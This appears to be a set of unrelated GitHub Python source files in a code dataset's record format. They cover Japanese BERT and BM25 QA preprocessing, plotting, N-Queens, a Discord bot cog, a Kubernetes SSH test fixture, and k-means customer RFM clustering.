attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n attention_mask = (\n [0 if mask_padding_with_zero else 1] * padding_length\n ) + attention_mask\n token_type_ids = (\n [pad_token_segment_id] * padding_length\n ) + token_type_ids\n else:\n input_ids = input_ids + ([pad_token] * padding_length)\n attention_mask = attention_mask + (\n [0 if mask_padding_with_zero else 1] * padding_length\n )\n token_type_ids = token_type_ids + (\n [pad_token_segment_id] * padding_length\n )\n return input_ids, attention_mask, token_type_ids\n\ndef make_bert_input2(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n context1 = get_contexts_bm25(entities[ending],question)\n text_a = context1\n text_b = question + tokenizer.sep_token + ending\n\n inputs = tokenizer.encode_plus(\n text_a,\n text_b,\n add_special_tokens=True,\n max_length=max_length,\n truncation=\"only_first\", # 常にcontextをtruncate\n )\n\n input_ids, token_type_ids = (\n inputs[\"input_ids\"],\n inputs[\"token_type_ids\"],\n )\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only\n # real tokens are attended to.\n attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n attention_mask = (\n [0 if mask_padding_with_zero else 1] * padding_length\n ) + attention_mask\n token_type_ids = (\n [pad_token_segment_id] * padding_length\n ) + token_type_ids\n else:\n input_ids = input_ids + ([pad_token] * padding_length)\n attention_mask = attention_mask + (\n [0 if mask_padding_with_zero else 1] * padding_length\n )\n token_type_ids = token_type_ids + (\n [pad_token_segment_id] * padding_length\n )\n return input_ids, attention_mask, token_type_ids\n\ndef make_bert_input3(ending,question,context2,mask_padding_with_zero,max_length,pad_on_left,pad_token,pad_token_segment_id):\n context1 = context2\n text_a = context1\n text_b = question + tokenizer.sep_token + ending\n\n inputs = tokenizer.encode_plus(\n text_a,\n text_b,\n add_special_tokens=True,\n max_length=max_length,\n truncation=\"only_first\", # 常にcontextをtruncate\n )\n\n input_ids, token_type_ids = (\n inputs[\"input_ids\"],\n inputs[\"token_type_ids\"],\n )\n\n # The mask has 1 for real tokens and 0 for padding tokens. Only\n # real tokens are attended to.\n attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)\n\n # Zero-pad up to the sequence length.\n padding_length = max_length - len(input_ids)\n if pad_on_left:\n input_ids = ([pad_token] * padding_length) + input_ids\n attention_mask = (\n [0 if mask_padding_with_zero else 1] * padding_length\n ) + attention_mask\n token_type_ids = (\n [pad_token_segment_id] * padding_length\n ) + token_type_ids\n else:\n input_ids = input_ids + ([pad_token] * padding_length)\n attention_mask = attention_mask + (\n [0 if mask_padding_with_zero else 1] * padding_length\n )\n token_type_ids = token_type_ids + (\n [pad_token_segment_id] * padding_length\n )\n return input_ids, attention_mask, token_type_ids\n\n\ndef get_qus_answers(input_file):\n with open(input_file, \"r\", encoding=\"utf-8\") as fin:\n lines = fin.readlines() \n queries = []\n answers = []\n for line in tqdm(lines):\n data_raw = json.loads(line.strip(\"\\n\"))\n question = data_raw[\"question\"].replace(\"_\", \"\") # \"_\" は cloze question\n answer = data_raw['answer_candidates']\n queries += [(question,answer)]\n# answers += [answer]\n return queries\n\ndef read_json(x):\n with open(x, \"r\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n lines = [eval(line) for line in lines] \n return lines\n\ndef get_contexts_bm25(sentence_list,query,topk=1000):\n sentence_list = sentence_list.split(\"。\")\n inverted_index = defaultdict(list)\n sentence_id2sentence = [sentence for sentence in sentence_list]\n sentence_id2token_count = []\n for sentence_id, sentence in enumerate(sentence_list):\n tokens = parse_text(sentence)\n \n sentence_id2token_count += [len(tokens)]\n\n count_tokens = Counter(tokens)\n for token, count in count_tokens.items():\n inverted_index[token] += [(sentence_id, count)]\n\n avgdl = sum(sentence_id2token_count) / len(sentence_id2token_count)\n parsed_query = parse_text(query)\n target_posting = {}\n for token in parsed_query:\n if token in inverted_index:\n postings_list = inverted_index[token]\n target_posting[token] = postings_list\n\n # bm25スコアでor検索\n k1 = 2.0\n b = 0.75\n all_docs = len(sentence_list)\n sentence_id2tfidf = [0 for i in range(all_docs)]\n for token, postings_list in target_posting.items():\n idf = math.log2((all_docs-len(postings_list)+0.5) / (len(postings_list) + 0.5))\n # idfが負になる単語は一般的すぎるので無視\n idf = max(idf, 0)\n if idf == 0:\n continue\n for sentence_id, tf in postings_list:\n dl = sentence_id2token_count[sentence_id]\n token_tfidf = idf * ((tf * (k1 + 1))/(tf + k1 * (1-b+b*(dl/avgdl))))\n sentence_id2tfidf[sentence_id] += token_tfidf\n\n sentences = [(sentence_id, tfidf) for sentence_id, tfidf in enumerate(sentence_id2tfidf) if tfidf != 0]\n sentences = sorted(sentences, key=lambda x: x[1], reverse=True)\n return \"。\".join(list(map(lambda x: sentence_id2sentence[x[0]], sentences[:topk])))\n\ndef get_contexts_bm25_add_answer(sentence_list,query,answer,topk=1000):\n sentence_list = sentence_list.split(\"。\")\n inverted_index = defaultdict(list)\n sentence_id2sentence = [sentence for sentence in sentence_list]\n sentence_id2token_count = []\n for sentence_id, sentence in enumerate(sentence_list):\n tokens = parse_text(sentence)\n \n sentence_id2token_count += [len(tokens)]\n\n count_tokens = Counter(tokens)\n for token, count in count_tokens.items():\n inverted_index[token] += [(sentence_id, count)]\n\n avgdl = sum(sentence_id2token_count) / len(sentence_id2token_count)\n parsed_query = parse_text(query)\n parsed_query += parse_text(answer)\n target_posting = {}\n for token in parsed_query:\n if token in inverted_index:\n postings_list = inverted_index[token]\n target_posting[token] = postings_list\n\n # bm25スコアでor検索\n k1 = 2.0\n b = 0.75\n all_docs = len(sentence_list)\n sentence_id2tfidf = [0 for i in range(all_docs)]\n for token, postings_list in target_posting.items():\n idf = math.log2((all_docs-len(postings_list)+0.5) / (len(postings_list) + 0.5))\n # idfが負になる単語は一般的すぎるので無視\n idf = max(idf, 0)\n if idf == 0:\n continue\n for sentence_id, tf in postings_list:\n dl = sentence_id2token_count[sentence_id]\n token_tfidf = idf * ((tf * (k1 + 1))/(tf + k1 * (1-b+b*(dl/avgdl))))\n sentence_id2tfidf[sentence_id] += token_tfidf\n\n sentences = [(sentence_id, tfidf) for sentence_id, tfidf in enumerate(sentence_id2tfidf) if tfidf != 0]\n sentences = sorted(sentences, key=lambda x: x[1], reverse=True)\n return \"。\".join(list(map(lambda x: sentence_id2sentence[x[0]], sentences[:topk])))\n\ndef parse_text(text):\n node = tagger.parseToNode(text)\n tokens = []\n while node:\n if node.feature.startswith(STOP_POSTAGS):\n pass\n else:\n feature = node.feature.split(\",\")\n if len(feature) >7:\n tokens += [feature[7].lower()]\n else:\n tokens += [node.surface.lower()]\n node = node.next\n return tokens\n\n\ndef select_field1(features, field):\n return [\n [choice[field] for choice in feature.choices_features1] for feature in features\n ]\n\ndef select_field2(features, field):\n return [\n [choice[field] for choice in feature.choices_features2] for feature in features\n ]\n\ndef select_field3(features, field):\n return [\n [choice[field] for choice in feature.choices_features3] for feature in features\n ]\n\ndef select_field4(features, field):\n return [\n [choice[field] for choice in feature.choices_features4] for feature in features\n ]\n\ndef get_batch(features):\n all_input_ids1 = torch.tensor(select_field1(features, \"input_ids\"), dtype=torch.long)\n all_input_mask1 = torch.tensor(select_field1(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids1 = torch.tensor(select_field1(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids1 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids2 = torch.tensor(select_field2(features, \"input_ids\"), dtype=torch.long)\n all_input_mask2 = torch.tensor(select_field2(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids2 = torch.tensor(select_field2(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids2 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids3 = torch.tensor(select_field3(features, \"input_ids\"), dtype=torch.long)\n all_input_mask3 = torch.tensor(select_field3(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids3 = torch.tensor(select_field3(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids3 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n all_input_ids4 = torch.tensor(select_field4(features, \"input_ids\"), dtype=torch.long)\n all_input_mask4 = torch.tensor(select_field4(features, \"input_mask\"), dtype=torch.long)\n all_segment_ids4 = torch.tensor(select_field4(features, \"segment_ids\"), dtype=torch.long)\n all_label_ids4 = torch.tensor([f.label for f in features], dtype=torch.long) \n \n inputs1 = (all_input_ids1,all_input_mask1,all_segment_ids1,all_label_ids1)\n inputs2 = (all_input_ids2,all_input_mask2,all_segment_ids2,all_label_ids2)\n inputs3 = (all_input_ids3,all_input_mask3,all_segment_ids3,all_label_ids3)\n inputs4 = (all_input_ids4,all_input_mask4,all_segment_ids4,all_label_ids4)\n \n return inputs1,inputs2,inputs3,inputs4\n\ndef get_inputs(mode=\"train\"):\n root_path = \"../data/\"\n json_file = f\"{mode}_questions.json\"\n \n json_data = read_json(root_path+json_file)\n ctx1 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10.pkl\",\"rb\"))\n ctx2 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10_ignore-answers.pkl\",\"rb\"))\n ctx3 = pickle.load(open(root_path+f\"{mode}_ctx_ids-top10_query-add-answers.pkl\",\"rb\"))\n \n \n for data,c1,c2,c3 in zip(json_data,ctx1,ctx2,ctx3):\n data[\"ctx1\"] = c2\n data[\"ctx2\"] = c1\n data[\"ctx3\"] = c3\n \n processor = JaqketProcessor()\n examples = processor.get_examples(\"dev\",root_path,json_data,entities)\n values = [(ex.contexts,ex.endings,ex.question,ex.label,ex.example_id,ex.ctx1,ex.ctx2,ex.ctx3) for ex in examples]\n with Pool(multiprocessing.cpu_count()) as p:\n features = list(tqdm(p.imap(convert_examples_to_features,values), total=len(values)))\n features = [f[0] for f in features]\n \n \n batch1,batch2,batch3,batch4 = get_batch(features)\n \n torch.save({f\"{mode}_input_ids\":batch1[0],\n f\"{mode}_input_mask\":batch1[1],\n f\"{mode}_segment_ids\":batch1[2],\n f\"{mode}_label_ids\":batch1[3]},root_path+f\"basev2-{mode}_features-seq768-sorted_title-bm25_search-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch2[0],\n f\"{mode}_input_mask\":batch2[1],\n f\"{mode}_segment_ids\":batch2[2],\n f\"{mode}_label_ids\":batch2[3]},root_path+f\"basev2-{mode}_features-seq768-title_only-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch3[0],\n f\"{mode}_input_mask\":batch3[1],\n f\"{mode}_segment_ids\":batch3[2],\n f\"{mode}_label_ids\":batch3[3]},root_path+f\"basev2-{mode}_features-seq768-question_only-search_ver3.pt\")\n \n torch.save({f\"{mode}_input_ids\":batch4[0],\n f\"{mode}_input_mask\":batch4[1],\n f\"{mode}_segment_ids\":batch4[2],\n f\"{mode}_label_ids\":batch4[3]},root_path+f\"basev2-{mode}_features-seq768-question_only-add_answer-search_ver3.pt\")\n \n \n return features\n\n\nif __name__ == \"__main__\":\n \n with open('../ir_dump/doc_id2title.pickle', 'rb') as f:\n doc_id2title = pickle.load(f)\n\n input_file = '../data/all_entities.json.gz'\n entitie2id = {k:v for v,k in enumerate(doc_id2title)}\n with gzip.open(input_file, \"rt\", encoding=\"utf-8\") as fin:\n lines = fin.readlines()\n\n entities = dict()\n for line in lines:\n entity = json.loads(line.strip())\n entities[entity[\"title\"]] = entity[\"text\"]\n del lines \n \n path_name = \"cl-tohoku/bert-base-japanese-v2\"\n tokenizer = BertJapaneseTokenizer.from_pretrained(path_name)\n\n features = get_inputs(mode=\"train\")\n features = get_inputs(mode=\"dev1\")\n features = get_inputs(mode=\"dev2\")","repo_name":"syuuuuukun/aio-solution","sub_path":"preprocess/make_inputs.py","file_name":"make_inputs.py","file_ext":"py","file_size_in_byte":24203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"95"} +{"seq_id":"33470693466","text":"from scipy.io import loadmat\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom read_capture_data import *\n\ndef main():\n\tdata = loadmat('readable_capture_data.mat');\n\n\tnormal = read_capture_data(data['normal_data']);\n\tinsuf_depth = read_capture_data(data['insuf_depth_data']);\n\n\tn_samples = 1000\n\ts = np.linspace(0, 1, n_samples)\n\n\n\tnormal_start = 435\n\tnormal_end = 726\n\tnormal_s_map = np.linspace(normal_start, normal_end, n_samples).astype(int)\n\n\tinsuf_depth_start = 133\n\tinsuf_depth_end = 345\n\tinsuf_depth_s_map = np.linspace(insuf_depth_start, insuf_depth_end, n_samples).astype(int)\n\n\thip_height_idx = 2\n\tplt.subplot(121)\n\tplt.plot(s, normal.position[normal_s_map, hip_height_idx])\n\tplt.plot(s, insuf_depth.position[insuf_depth_s_map, hip_height_idx])\n\tplt.xlabel(\"Squat Path Variable, S (unitless)\")\n\tplt.ylabel(\"Hip Height (m)\")\n\tplt.legend([\"Baseline\",\"Insufficient Depth\"])\n\tplt.title(\"Normal Vs Insufficient Depth Hip Height\")\n\n\tplt.subplot(122)\n\n\tr_hip_idx = 14\n\tr_knee_idx = 15\n\tr_ankle_idx = 16\n\tl_hip_idx = 18\n\tl_knee_idx = 19\n\tl_ankle_idx = 20\n\n\tangle_diff = normal.joint_angles[normal_s_map,:]-insuf_depth.joint_angles[insuf_depth_s_map,:]\n\n\tplt.plot(s, angle_diff[:, 3*r_hip_idx+2],'r')\n\tplt.plot(s, angle_diff[:, 3*r_knee_idx+2],'g')\n\tplt.plot(s, angle_diff[:, 3*r_ankle_idx+2],'b')\n\tplt.plot(s, angle_diff[:, 3*l_hip_idx+2],'m')\n\tplt.plot(s, angle_diff[:, 3*l_knee_idx+2],'y')\n\tplt.plot(s, angle_diff[:, 3*l_ankle_idx+2],'c')\n\tplt.xlabel(\"Squat Path Variable, S (unitless)\")\n\tplt.ylabel(\"Joint Angle Error (deg)\")\n\tplt.legend([\"Right Hip\",\"Right Knee\",\"Right Ankle\",\"Left Hip\",\"Left Knee\",\"Left Ankle\"])\n\tplt.title(\"Error (Difference in Joint Angles)\");\n\n\tplt.show()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"RowanFerrabee/IMU_State_Estimation","sub_path":"moven_capture_data/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"32737517691","text":"def solve_n_queens(n):\r\n board = [['.' for _ in range(n)] for _ in range(n)]\r\n solutions = []\r\n\r\n def is_safe(row, col):\r\n # Check if no queens threaten the current position\r\n for i in range(row):\r\n if board[i][col] == 'Q':\r\n return False\r\n j = row - i\r\n if col - j >= 0 and board[i][col - j] == 'Q':\r\n return False\r\n if col + j < n and board[i][col + j] == 'Q':\r\n return False\r\n return True\r\n\r\n def backtrack(row):\r\n # Base case: All rows have been filled, add the solution\r\n if row == n:\r\n solutions.append([''.join(row) for row in board])\r\n return\r\n\r\n # Try placing a queen in each column of the current row\r\n for col in range(n):\r\n if is_safe(row, col):\r\n board[row][col] = 'Q'\r\n backtrack(row + 1)\r\n board[row][col] = '.'\r\n\r\n backtrack(0)\r\n return solutions\r\n\r\n# Test the implementation\r\nn = 4\r\nsolutions = solve_n_queens(n)\r\nprint(f\"Number of solutions for {n}-Queens problem: {len(solutions)}\")\r\nfor i, solution in enumerate(solutions):\r\n print(f\"Solution {i+1}:\")\r\n for row in solution:\r\n print(row)\r\n print()\r\n ","repo_name":"nehaaero/DS300123","sub_path":"Assignment-4-Q-1-1-DSA-advance.py","file_name":"Assignment-4-Q-1-1-DSA-advance.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"32352479294","text":"import face_test2 as t\n\n\ndef test3prec(nb_files):\n str1 = 'v3model'\n str2 = '.npz'\n print(\"Starting test differents modeles (t)\")\n num_mod = 0\n res3pres = []\n\n for i in range(nb_files):\n res3pres.append(t.launchTests(str1+str(i*50)+str2, t.dbs, t.dbd, threshold = 1.19))\n print(\"model tested :\"+str1+str(i*50)+str2)\n print('Liste des 3 precisions en faisant varier le modele:')\n print(res3pres)\n return(res3pres)\n\n\ndef testseuilVariable(mini,maxi,model, nb):\n print(\"Starting test seuilvariable\")\n seuil = list(mini+i*(maxi-mini)/float(nb) for i in range(nb))\n res3pres1 = list()\n res3pres2 = list()\n res3pres3 = list()\n for i in range(nb):\n res3pres1.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[0])\n res3pres2.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[1])\n res3pres3.append(t.launchTests(model, t.dbs, t.dbd, threshold = seuil[i])[2])\n print(\"Seuil teste : \"+str(seuil[i]))\n print(\"Liste des 3 precisions pour le seuil qui varie:\")\n print(res3pres)\n return((res3pres1, res3pres2, res3pres3))\n\n\n\n#presOvertime = test3prec(18)\n#presOverSeuil = testseuilVariable(0,2, 'v3model950.npz',20)\n\n#presOverSeuilZoom = testseuilVariable(0.9,1.3, 'v3model950.npz',16)\n","repo_name":"RaphaelGraille/FaceVerification","sub_path":"test3precision.py","file_name":"test3precision.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"42345648935","text":"import discord\nfrom discord.ext import commands\nimport unicodedata\n\nuser = None\nmsgr = None\n\nclass helpCog(commands.Cog, name=\"help\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def help(self, ctx):\n author = ctx.message.author\n helpmessage =[]\n helpmessage.append(\"```md\")\n\n helpmessage.append(\"# How to use ellec-bot\")\n helpmessage.append(\"\\n\")\n animerole = discord.utils.get(ctx.guild.roles, name=\"anime\")\n if animerole in author.roles:\n helpmessage.append(\"< Anime Functions >\")\n helpmessage.append(\"<anime functions only for 'anime' role and in #eye-cartons>\")\n helpmessage.append(\"rebuild - rebuild the anime cache, use this if stuff doesnt work\")\n helpmessage.append(\"anime - list of anime we're watching this season\")\n helpmessage.append(\"s + *search* - searches nyaa.si with *search*\")\n helpmessage.append(\"chen *- anime for that day with links\")\n helpmessage.append(\" * defaults today\"\n \" * yesterday\"\n \" * day (eg. Friday)\")\n helpmessage.append(\"\\n\")\n\n helpmessage.append('< Admin Functions >')\n helpmessage.append('banlist - list of banned words/phrases')\n helpmessage.append('status - list of current function statuses')\n \n if ctx.guild.get_member(author.id).guild_permissions.manage_messages:\n helpmessage.append('pit - toggles pit function')\n helpmessage.append('unpit - toggles an unpit function')\n helpmessage.append('timer * - change the time on unpit after the next unpit')\n helpmessage.append('banadd * - add a term to the banlist')\n helpmessage.append('banremove * - removes a term from the banlist')\n helpmessage.append(\"```\")\n mess = '\\n'.join(helpmessage)\n await author.send(mess)\n\n @commands.command()\n async def print(self, ctx, arg):\n print(arg)\n\n @commands.command()\n async def permcheck(self, ctx):\n id = ctx.author.id\n member = ctx.guild.get_member(id)\n if member.guild_permissions.manage_messages:\n print(\"IS A MOD\")\n\n @commands.command()\n @commands.has_permissions(manage_roles=True)\n async def charinfo(self, ctx, *, characters: str):\n\n def to_string(c):\n digit = f'{ord(c):x}'\n name = unicodedata.name(c, 'Name not found.')\n return f'`\\\\U{digit:>08}`: {name} - {c} \\N{EM DASH} <http://www.fileformat.info/info/unicode/char/{digit}>'\n msg = '\\n'.join(map(to_string, characters))\n if len(msg) > 2000:\n return await ctx.send('Output too long to display.')\n await ctx.send(msg)\n\ndef setup(bot):\n bot.add_cog(helpCog(bot))\n print('help cog loaded')","repo_name":"hamracer/ullecbot","sub_path":"cogs/old/help.py","file_name":"help.py","file_ext":"py","file_size_in_byte":2882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"17344433932","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef load_dataset(image:str):\n\timg=plt.imread(image)\n\n\t#let's just get rid of the A value, since we don't need that\n\timg=img[:,:,:3]\n\treturn img\n\n#Calculate the cumulative loss\ndef calculate_distortion(r, mu, x):\n\tN=len(x)\n\tK=len(mu)\n\n\tJ=0\n\n\tfor n in range(N):\n\t\tfor k in range(K):\n\t\t\tif r[n]==k:\n\t\t\t\tJ+=np.square(np.linalg.norm(x[n]-mu[k]))\n\treturn J\n\n#Randomly initialize the centers\ndef initialize_mu(X, k):\n\tmu_list=random.sample(list(X),k)\n\treturn mu_list\n\n#Compute the difference between two spots\ndef euclidean_distance(x,y):\n\ttotal=0\n\tfor i in range(len(x)):\n\t\ttotal+=np.square(x[i]-y[i])\n\treturn np.sqrt(total)\n\n#Update which center the points are assigned to by computing the euclidean distance\ndef update_r(X, mu):\n\tr=np.zeros(len(X))\n\tfor i in range(len(X)):\n\t\tmin_dist=9999\n\t\tclosest_center=None\n\t\tfor k in range(len(mu)):\n\t\t\tk_dist=euclidean_distance(X[i],mu[k])\n\t\t\tif k_dist<min_dist:\n\t\t\t\tmin_dist=k_dist\n\t\t\t\tclosest_center=k\n\t\tr[i]=closest_center\n\treturn r\n\n\n#Update the mean values by taking the average of the points assigned to that class\ndef update_mu(X, r, k):\n\tmu=np.zeros((k,3))\n\tfor i in range(k):\n\t\tc=np.zeros(3)\n\t\tclass_count=0\n\t\tfor n in range(len(X)):\n\t\t\t#Sum over the points assigned to that class\n\t\t\tif(r[n]==i):\n\t\t\t\tc=c+X[n]\n\t\t\t\tclass_count+=1\n\t\t#Preventing divide by zero\n\t\tif class_count==0:\n\t\t\tclass_count=1\n\t\t#Divide by the number of points assigned to that class to get the average\n\t\tc/=class_count\n\t\tmu[i]=c\n\treturn mu\n\n\n#Run the k-means algorithm over an image and print the loss over iterations\ndef kmeans(image:str):\n\timg=load_dataset(image)\n\trows=img.shape[0]\n\tcols=img.shape[1]\n\tX=np.reshape(img, (img.shape[0]*img.shape[1], img.shape[2]))\n\n\n\tmax_iterations=100000000000000\n\tk_list=[3,5,7]\n\tfor k in k_list:\n\t\tloss=[]\n\t\tcenters=initialize_mu(X,k)\n\t\tloss_threshold=0.001\n\t\tfor i in range(max_iterations):\n\t\t\tr=update_r(X, centers)\n\t\t\tj=calculate_distortion(r,centers,X)\n\t\t\tcenters=update_mu(X, r, k)\n\t\t\tprint(\"For iteration:%s, number of centers:%s, the distortion measure is %s\" % (i,k,j))\n\t\t\tloss.append(j)\n\t\t\tif(len(loss)>1):\n\t\t\t\tif(abs(loss[i]-loss[i-1])<loss_threshold):\n\t\t\t\t\tbreak\n\n\t\t#Save the compressed image\t\t\t\n\t\tfinal_r=update_r(X, centers)\n\t\trecovered=centers[final_r.astype(int)]\n\t\trecovered=np.reshape(recovered, (rows, cols, 3))\n\t\tplt.imsave('q3_compressed_image_'+str(k)+'.png',recovered)\n\n\t\t#Plot the cumulative loss over the iterations for this particular number of prototypes\n\t\tfig=plt.figure()\n\t\tfig_axes=fig.add_axes([0.1,0.1,0.8,0.8])\n\t\tfig_axes.plot(loss)\n\t\tfig_axes.set_xlabel('Number of Iterations')\n\t\tfig_axes.set_ylabel('Cumulative Loss')\n\t\tfig_axes.set_title('Loss Over Iterations For '+ str(k)+' Prototypes')\n\t\tfig.savefig('q3_k'+str(k))\n\n\nif __name__ == '__main__':\n\tkmeans('umn_csci.png')","repo_name":"emulhall/CSCI5525-Machine-Learning","sub_path":"Hw4/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"39726390628","text":"from kubernetes.client import (\n V1Container,\n V1ContainerPort,\n V1Deployment,\n V1DeploymentSpec,\n V1EnvVar,\n V1LabelSelector,\n V1ObjectMeta,\n V1PodSpec,\n V1PodTemplateSpec,\n V1Service,\n V1ServicePort,\n V1ServiceSpec,\n)\n\nfrom materialize.cloudtest import DEFAULT_K8S_NAMESPACE\nfrom materialize.cloudtest.k8s.api.k8s_deployment import K8sDeployment\nfrom materialize.cloudtest.k8s.api.k8s_resource import K8sResource\nfrom materialize.cloudtest.k8s.api.k8s_service import K8sService\n\n\nclass SshDeployment(K8sDeployment):\n def __init__(self, namespace: str) -> None:\n super().__init__(namespace)\n env = [\n V1EnvVar(name=\"SSH_USERS\", value=\"mz:1000:1000\"),\n V1EnvVar(name=\"TCP_FORWARDING\", value=\"true\"),\n ]\n ports = [V1ContainerPort(container_port=22, name=\"ssh\")]\n container = V1Container(\n name=\"ssh-bastion-host\",\n image=\"panubo/sshd:1.5.0\",\n env=env,\n ports=ports,\n )\n\n template = V1PodTemplateSpec(\n metadata=V1ObjectMeta(labels={\"app\": \"ssh-bastion-host\"}),\n spec=V1PodSpec(containers=[container]),\n )\n\n selector = V1LabelSelector(match_labels={\"app\": \"ssh-bastion-host\"})\n\n spec = V1DeploymentSpec(replicas=1, template=template, selector=selector)\n\n self.deployment = V1Deployment(\n api_version=\"apps/v1\",\n kind=\"Deployment\",\n metadata=V1ObjectMeta(name=\"ssh-bastion-host\"),\n spec=spec,\n )\n\n\nclass SshService(K8sService):\n def __init__(self, namespace: str) -> None:\n super().__init__(namespace)\n ports = [\n V1ServicePort(name=\"ssh\", port=22),\n ]\n\n self.service = V1Service(\n metadata=V1ObjectMeta(\n name=\"ssh-bastion-host\", labels={\"app\": \"ssh-bastion-host\"}\n ),\n spec=V1ServiceSpec(\n type=\"NodePort\", ports=ports, selector={\"app\": \"ssh-bastion-host\"}\n ),\n )\n\n\ndef ssh_resources(namespace: str = DEFAULT_K8S_NAMESPACE) -> list[K8sResource]:\n return [SshDeployment(namespace), SshService(namespace)]\n","repo_name":"MaterializeInc/materialize","sub_path":"misc/python/materialize/cloudtest/k8s/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":5389,"dataset":"github-code","pt":"95"} +{"seq_id":"13257161848","text":"import random\n\n\ndef get_random(floor, ceiling):\n return random.randint(floor, ceiling)\n\n\ndef naive_shuffle(the_list):\n # For each index in the list\n for first_index in range(0, len(the_list)):\n # Grab a random other index\n second_index = get_random(first_index, len(the_list) - 1)\n # And swap the values\n if second_index != first_index:\n the_list[first_index], the_list[second_index] = \\\n the_list[second_index], the_list[first_index]\n\n return the_list\n\n\nprint(naive_shuffle([1,2,3]))\n\n\n","repo_name":"dhruvarora93/Algorithm-Questions","sub_path":"Array Problems/shuffle_list.py","file_name":"shuffle_list.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"24630293469","text":"import turtle\nimport time\n\nt = turtle.Turtle()\nt.speed('fastest')\nt.hideturtle()\nt.penup()\nt.goto(180, 0)\nt.pendown()\n\n# SETTINGS #\nbase = 100\ntotal = 130\nside = total - base\nangle = 15\n\n# Dont show turtle movements until done\nturtle.tracer(0, 0)\n\nloop = True\nwhile loop:\n\tt.fd(base)\n\tt.left(180)\n\tt.right(angle)\n\tt.fd(side)\n\tt.goto(180, 0)\n\tt.seth(0)\n\tprint(\"angle: \" + str(angle))\n\tbase -= 5\n\tside = total - base\n\tangle += 5\n\n\tif angle >= 900:\n\t\tloop = False\n\n# Display all new lines\nturtle.update()\n# turtle.done()\n\ninput(\"Press a button\")\n## SAVE\nts = turtle.getscreen()\nts.getcanvas().postscript(file=\"script_output.eps\")","repo_name":"eebmagic/python_turtle_art","sub_path":"sliding_triangles/slidingTriangles.py","file_name":"slidingTriangles.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"12250270567","text":"# coding: utf-8\n# ---------------------------------------------------------------------------------\n# RFM data collection\n# + Recency - amount of time since the customer’s most recent transaction [days_since_last_nonclub_order]\n# + Frequency - total number of transactions made by the customer (during a defined period) [total_orders]\n# + Monetary - total amount that the customer has spent across all transactions (during a defined period) [lifetime_value]\n# ---------------------------------------------------------------------------------\n# K-mean clustering\n# Divide the customer list into tiered groups with more homogeneous characteristics for each of the three dimensions (R, F and M) via K-mean clustering method.\n# Related link - http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html\n\n\n# Load global libs\nimport pandas as pd\nimport os, time, sys\nimport psycopg2\nfrom datetime import date, timedelta, datetime as DT\nfrom sklearn.cluster import KMeans\n\n# Time zone setup\nos.environ['TZ'] = 'US/Pacific'\ntime.tzset()\n\n\n# Utility functions and main\ndef _tstamp():\n \"\"\"\n formatted time stamp\n \"\"\"\n ts = time.time()\n # time.strftime('%X %x %Z')\n return '[{:s}]'.format(DT.fromtimestamp(ts).strftime('%m-%d %H:%M:%S'))\n\ndef get_order_data_from_db(qry_str):\n \"\"\"\n extract data via sql query\n \"\"\"\n conn = psycopg2.connect(dbname='matrix',\n host='xxxxxxxx',\n port='xxxxxxxx', user='xxxxxxxx', password='xxxxxxxx')\n df3 = pd.read_sql_query(qry_str, conn)\n conn.close()\n return df3\n\ndef main():\n qry_customer_RFM = '''\n SELECT\n \tcustomer_id,\n \tCOALESCE(days_since_last_nonclub_order,0) AS recency,\n \ttotal_orders AS frequency,\n \tlifetime_value AS monetary\n FROM\n \tcustomer_order\n WHERE lifetime_value >0 AND first_order_date >= '2009-04-13 21:06:20'\n AND first_order_date < current_date --limit 10000\n '''\n\n # Load customer RFM data into dataframe\n #df_cust_RFM = pd.read_csv('customer_RFM1.csv', delimiter=',')\n df_cust_RFM = 